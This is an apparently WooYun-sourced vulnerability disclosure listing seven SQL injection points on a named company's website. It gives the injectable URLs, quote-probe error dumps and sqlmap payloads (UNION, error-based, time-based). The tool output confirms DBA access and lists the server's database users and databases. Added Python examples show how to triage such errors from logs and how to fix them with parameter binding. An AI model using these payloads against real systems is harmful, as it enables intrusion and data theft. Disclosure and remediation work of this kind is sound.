
Seven SQL injections in an interface file on one of Octmami's (十月妈咪) sites (DBA privileges)

2015-12-23 10:00

Location 1

There are two parameters here.

http://corp.octmami.com/ajax_video.php?now_video=8'&type=no_type&times=0.1655799720901996&_=1445346057351

Error returned:

Code:
Web! info: MySQL Query Error
Time: 2015-11-07 11:05:49
Script:
SQL: select * from `oc_video` where w_id=8\' order by norder asc
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by norder asc' at line 1
Errno: 1064





http://corp.octmami.com/ajax_video.php?now_video=8&type=no_type'&times=0.1655799720901996&_=1445346057351

Error returned:

Code:
Web! info: MySQL Query Error
Time: 2015-11-07 11:03:44
Script:
SQL: select * from `oc_video` where typeid=no_type\' w_id=8 order by norder asc
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' w_id=8 order by norder asc' at line 1
Errno: 1064



So both parameters are injectable!
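The two error dumps above are the kind of evidence a defender can also harvest: the application escaped the single quote (it arrives in the SQL as `\'`), yet the query still failed with Errno 1064 because the value sits outside quotes in a numeric comparison. An application error log with entries in this layout can therefore be triaged automatically. The following Python script is an added example, not part of the original report or the site's code; the three log entries it parses are constructed to mimic the report's format (script paths and the third entry's error are placeholders), and the table names are borrowed from the dumps above.

```python
import re
from dataclasses import dataclass, field

# Constructed sample: three entries in the "Web! info: MySQL Query Error" layout
# quoted in the report. Script paths and the third error are placeholders, not real log data.
SAMPLE_LOG = """Web! info: MySQL Query Error
Time: 2015-11-07 11:05:49
Script: /ajax_video.php
SQL: select * from `oc_video` where w_id=8\\' order by norder asc
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\\' order by norder asc' at line 1
Errno: 1064

Web! info: MySQL Query Error
Time: 2015-11-07 11:27:28
Script: /product.php
SQL: select * from `oc_product_sort` where s_id=2 UNION ALL SELECT NULL,NULL
Error: The used SELECT statements have a different number of columns
Errno: 1222

Web! info: MySQL Query Error
Time: 2015-11-07 12:00:00
Script: /classroom.php
SQL: select * from `oc_wiki_info` where i_id=60
Error: Table 'appdb.oc_wiki_info' doesn't exist
Errno: 1146
"""


@dataclass
class QueryError:
    time: str
    script: str
    sql: str
    error: str
    errno: int
    verdicts: list = field(default_factory=list)


def parse_error_log(text):
    """Split the log into blank-line separated entries and read their 'Key: value' lines."""
    entries = []
    for block in re.split(r"\n\s*\n", text.strip()):
        fields = {}
        for line in block.splitlines():
            key, sep, value = line.partition(":")
            if sep:
                fields[key.strip()] = value.strip()
        if "SQL" not in fields:
            continue  # not a query-error entry
        entries.append(QueryError(
            time=fields.get("Time", ""),
            script=fields.get("Script", ""),
            sql=fields["SQL"],
            error=fields.get("Error", ""),
            errno=int(fields.get("Errno", "0")),
        ))
    return entries


# A quote that arrived escaped (\' or \") directly after "name=value": the application
# escaped the input, but the value is outside quotes, so a numeric parameter is concatenated.
ESCAPED_QUOTE = re.compile(r"""(\w+)\s*=\s*(\S*?)\\['"]""")
# Keywords that do not belong in this application's own simple SELECTs.
PAYLOAD_KEYWORDS = re.compile(r"\b(UNION|SLEEP|BENCHMARK|INFORMATION_SCHEMA)\b", re.IGNORECASE)


def classify(entry):
    """Attach verdict strings to an entry and return them."""
    verdicts = []
    probe = ESCAPED_QUOTE.search(entry.sql)
    if entry.errno == 1064 and probe:
        verdicts.append("quote probe on unquoted parameter %s=%r" % (probe.group(1), probe.group(2)))
    if PAYLOAD_KEYWORDS.search(entry.sql):
        verdicts.append("injection payload keyword in SQL")
    if not verdicts:
        verdicts.append("ordinary query error")
    entry.verdicts = verdicts
    return verdicts


def triage(text):
    """Parse a log and return (time, errno, verdicts) per entry, suspicious entries first."""
    entries = parse_error_log(text)
    for entry in entries:
        classify(entry)
    entries.sort(key=lambda e: e.verdicts == ["ordinary query error"])
    return [(e.time, e.errno, e.verdicts) for e in entries]


if __name__ == "__main__":
    for time, errno, verdicts in triage(SAMPLE_LOG):
        print(time, errno, "; ".join(verdicts))
```

The first rule is the important one for this report: an escaped quote immediately after `name=value` in a 1064 error means the code escapes input but never quotes it, which is exactly the "Unescaped numeric" situation sqlmap reports further down. Entries with that verdict identify the parameter to fix, without needing a scanner.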

Now testing with sqlmap.

[screenshot: 1.jpg]

[screenshot: 2.jpg]



Code:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: type
    Type: UNION query
    Title: MySQL UNION query (NULL) - 10 columns
    Payload: now_video=8&type=-5190 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7163767271,0x4b797549777567624753,0x716e787371),NULL,NULL,NULL,NULL,NULL#&times=0.1655799720901996&_=1445346057351

Place: GET
Parameter: now_video
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: now_video=8 AND 6377=6377&type=no_type&times=0.1655799720901996&_=1445346057351

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: now_video=8 AND (SELECT 9111 FROM(SELECT COUNT(*),CONCAT(0x7163767271,(SELECT (CASE WHEN (9111=9111) THEN 1 ELSE 0 END)),0x716e787371,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&type=no_type&times=0.1655799720901996&_=1445346057351

    Type: UNION query
    Title: Generic UNION query (NULL) - 10 columns
    Payload: now_video=-5154 UNION ALL SELECT NULL,NULL,NULL,NULL,CONCAT(0x7163767271,0x4a645a524f5669585546,0x716e787371),NULL,NULL,NULL,NULL,NULL-- &type=no_type&times=0.1655799720901996&_=1445346057351

    Type: AND/OR time-based blind
    Title: MySQL > 5.0.11 AND time-based blind
    Payload: now_video=8 AND SLEEP(5)&type=no_type&times=0.1655799720901996&_=1445346057351
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: type, type: Unescaped numeric (default)
[1] place: GET, parameter: now_video, type: Unescaped numeric
[q] Quit
> 1
[19:08:17] [INFO] testing MySQL
[19:08:17] [INFO] confirming MySQL
[19:08:18] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.16, PHP 5.6.12
back-end DBMS: MySQL >= 5.0.0
[19:08:18] [INFO] fetching current user
current user: 'oct_crop@%'
[19:08:18] [INFO] fetching current database
current database: 'octmami'
[19:08:18] [INFO] testing if current user is DBA
[19:08:18] [INFO] fetching current user
current user is DBA: True

database management system users [9]:
[*] ''@'localhost'
[*] 'chen'@'%'
[*] 'ecstore'@'localhost'
[*] 'proftpd'@'%'
[*] 'proftpd'@'localhost'
[*] 'root'@'%'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'

available databases [11]:
[*] corp
[*] ecstore
[*] information_schema
[*] mysql
[*] octmami
[*] performance_schema
[*] purchase
[*] server
[*] test
[*] youxi
[*] zentao

The testing process was unstable and kept disconnecting, so I did not continue testing; for details refer to the report below, it is the same situation:

WooYun: Octmami back-end system has a weak password, and after login there are multiple SQL injections (DBA privileges + arbitrary file read + large amount of information [possibly test data])

It was tested there.



Location 2:

http://corp.octmami.com/ajax_video.php?type=4'&times=0.5367835881188512&_=1445345926532

Error returned:

Code:
Web! info: MySQL Query Error
Time: 2015-11-07 11:27:28
Script:
SQL: select * from `oc_video` where typeid=4\' order by norder asc
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by norder asc' at line 1
Errno: 1064



Same thing, so not tested further.



Location 3

http://corp.octmami.com/ajax_magazine.php?type=3&times=0.38723763078451157&_=1445351065660

Error returned:

Code:
Web! info: MySQL Query Error
Time: 2015-11-07 11:37:07
Script:
SQL: select * from `oc_magazine` where typeid=3\' order by norder asc
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by norder asc' at line 1
Errno: 1064





The remaining ones were not tested further, because the system is unstable and drops after a few seconds of access.

I am using the records from the previous test directly.



Location 4

http://corp.octmami.com/product.php?m=product_list&category=2'

Code:
Web! info: MySQL Query Error
Time: 2015-11-07 12:18:35
Script:
SQL: select * from `oc_product_sort` where s_id=2\'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Errno: 1064





Location 5

http://corp.octmami.com/product.php?m=product&category=2&item=1069'

http://corp.octmami.com/product.php?m=product&category=2'&item=1069

Code:
Web! info: MySQL Query Error
Time: 2015-11-07 12:19:30
Script:
SQL: select * from `oc_product`where name_cn<>"" and p_id=1069\' and ptype=2 order by p_id desc,norder asc
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' and ptype=2 order by p_id desc,norder asc' at line 1
Errno: 1064

Web! info: MySQL Query Error
Time: 2015-11-07 12:19:57
Script:
SQL: select * from `oc_product`where name_cn<>"" and p_id=1069 and ptype=2\' order by p_id desc,norder asc
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by p_id desc,norder asc' at line 1
Errno: 1064





Location 6

http://corp.octmami.com/classroom.php?page=214&item=60'

Code:
Web! info: MySQL Query Error
Time: 2015-11-07 12:22:06
Script:
SQL: select * from `oc_wiki_info` where i_id=60\'
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\'' at line 1
Errno: 1064



[screenshot: 测试.jpg]





Location 7

http://corp.octmami.com/ajax_magazine.php?now_magazine=1'&type=no_type&times=0.4457961064763367&_=1446902294075

Error message returned:

Code:
Web! info: MySQL Query Error
Time: 2015-11-07 17:24:06
Script:
SQL: select * from `oc_magazine` where id=1\' order by norder asc
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by norder asc' at line 1
Errno: 1064





http://corp.octmami.com/ajax_magazine.php?type=4'&times=0.9216494632419199&_=1446902299660

Error message returned:



Code:
Web! info: MySQL Query Error
Time: 2015-11-07 18:12:30
Script:
SQL: select * from `oc_magazine` where typeid=4\' order by norder asc
Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '\' order by norder asc' at line 1
Errno: 1064





Tested in the middle of the night; I noticed the times do not match up, perhaps the system clock is set differently?



[screenshot: corp1.jpg]

[screenshot: corp2.jpg]



sqlmap test



Code:
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: type
    Type: UNION query
    Title: MySQL UNION query (69) - 8 columns
    Payload: now_magazine=1&type=-3688 UNION ALL SELECT 69,69,69,69,69,CONCAT(0x7166757971,0x4b6665667a7575427358,0x7173657771),69,69#&times=0.4457961064763367&_=1446902294075

Place: GET
Parameter: now_magazine
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause
    Payload: now_magazine=1 AND (SELECT 2251 FROM(SELECT COUNT(*),CONCAT(0x7166757971,(SELECT (CASE WHEN (2251=2251) THEN 1 ELSE 0 END)),0x7173657771,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)&type=no_type&times=0.4457961064763367&_=1446902294075
---
there were multiple injection points, please select the one to use for following injections:
[0] place: GET, parameter: type, type: Unescaped numeric (default)
[1] place: GET, parameter: now_magazine, type: Unescaped numeric
[q] Quit
> 1
[01:25:15] [INFO] testing MySQL
[01:25:15] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[01:25:15] [WARNING] if the problem persists please try to lower the number of used threads (option '--threads')
[01:25:16] [CRITICAL] unable to connect to the target URL or proxy. sqlmap is going to retry the request
[01:25:18] [WARNING] reflective value(s) found and filtering out
[01:25:18] [INFO] confirming MySQL
[01:25:18] [INFO] the back-end DBMS is MySQL
web application technology: Apache 2.4.16, PHP 5.6.12
back-end DBMS: MySQL >= 5.0.0
[01:25:18] [INFO] fetching current user
[01:25:19] [INFO] retrieved: oct_crop@%
current user: 'oct_crop@%'
[01:25:19] [INFO] fetching current database
[01:25:19] [INFO] retrieved: octmami
current database: 'octmami'
[01:25:19] [INFO] testing if current user is DBA
[01:25:19] [INFO] fetching current user
current user is DBA: True



[screenshot: corp3.jpg]

[screenshot: corp4.jpg]



Still too slow, connecting and dropping intermittently, so I stopped here.

Proof of vulnerability:

As above.

Remediation:

Fix by filtering the input.
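The one-line remediation leaves the mechanism implicit, and the error dumps throughout this report show why plain escaping was not enough: the quote arrives escaped as `\'`, yet the query breaks, because the value is concatenated into an unquoted numeric comparison where escaping does not apply (sqlmap calls this "Unescaped numeric"). The following Python model is an added example, not the site's PHP code; it uses SQLite so it runs offline, borrows the `oc_video` table and `w_id`/`typeid`/`norder` column names from the report's dumps, and constructs its own rows. It contrasts the concatenation pattern with the fix a practitioner would apply: validate the type, then bind the value as a parameter.

```python
import sqlite3

# The site's queries run against MySQL from PHP; this model uses SQLite so it runs
# offline. Table and column names follow the report's error dumps; rows are constructed.


def addslashes(value):
    """Model of PHP addslashes()/magic_quotes: escapes quotes and backslashes, nothing else."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def setup():
    conn = sqlite3.connect(":memory:")
    conn.execute("create table oc_video (w_id integer, typeid text, title text, norder integer)")
    conn.executemany("insert into oc_video values (?, ?, ?, ?)", [
        (8, "no_type", "public clip", 1),
        (9, "no_type", "second public clip", 2),
        (42, "internal", "unpublished draft", 3),
    ])
    return conn


def vulnerable_lookup(conn, now_video):
    """The pattern behind the report's 1064 errors: escaped input concatenated into an
    unquoted numeric comparison. A quote now breaks the query, but quote-free input
    is passed through untouched."""
    sql = "select title from oc_video where w_id=" + addslashes(now_video) + " order by norder asc"
    return [row[0] for row in conn.execute(sql)]


def hardened_lookup(conn, now_video):
    """Validate the type, then bind the value; the SQL text never contains user input."""
    if not now_video.isdigit():
        raise ValueError("now_video must be a non-negative integer")
    sql = "select title from oc_video where w_id=? order by norder asc"
    return [row[0] for row in conn.execute(sql, (int(now_video),))]


def query_breaks(conn, now_video):
    """True when the concatenated query fails to parse (the report's Errno 1064 case)."""
    try:
        vulnerable_lookup(conn, now_video)
    except sqlite3.Error:
        return True
    return False


def rejected(conn, now_video):
    """True when the hardened version refuses the value before touching the database."""
    try:
        hardened_lookup(conn, now_video)
    except ValueError:
        return True
    return False


if __name__ == "__main__":
    conn = setup()
    print("normal:", vulnerable_lookup(conn, "8"))
    print("quote after escaping breaks the query:", query_breaks(conn, "8'"))
    print("quote-free condition slips past escaping:", vulnerable_lookup(conn, "8 or 1=1"))
    print("hardened rejects it:", rejected(conn, "8 or 1=1"))
    print("hardened normal:", hardened_lookup(conn, "8"))
```

The point of the model is that "filtering" has to mean type validation and parameter binding, not quote escaping: `addslashes` never sees anything to escape in a quote-free value, so the unpublished row leaks, while the hardened version raises before the database is touched and passes the integer as a bound parameter. The same change applies to every `typeid`, `category`, `item`, `now_magazine` and `page` parameter listed above.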


Source: www.wooyun.org/bugs/wooyun-2015-0152658
